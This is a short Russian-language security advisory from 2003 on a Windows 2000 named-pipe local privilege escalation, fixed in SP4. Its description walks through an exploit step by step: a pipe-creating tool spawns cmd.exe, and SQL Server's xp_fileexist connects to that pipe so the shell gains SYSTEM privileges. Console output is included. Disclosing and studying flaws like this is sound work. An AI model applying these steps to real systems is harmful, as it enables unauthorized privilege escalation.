Дата публикации: | 10.07.2003 |
Всего просмотров: | 1514 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: |
Уязвимость обнаружена в в именованных каналах в Windows 2000. Локальный пользователь может получить SYSTEM привилегии. C:\>mssqlpipe.exe cmd.exe Creating pipe: \\.\Pipe\atstake Pipe created, waiting for connection Connect to the database (with isql for example) and execute: xp_fileexist '\\SERVERNAME\pipe\atstake'Затем в командной оболочке #2: C:\>isql -U andreas Password: 1> xp_fileexist '\\TEMP123\pipe\atstake' 2> go File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 1 0 1После чего вернитесь в командную оболочку #1, которая теперь будет выполняться с SYSTEM привилегиями. Уязвимость обнаружена в MS Windows 2000 Для устранения уязвимости, установите Windows 2000 SP4 |
Ссылки: | Named Pipe Filename Local Privilege Escalation |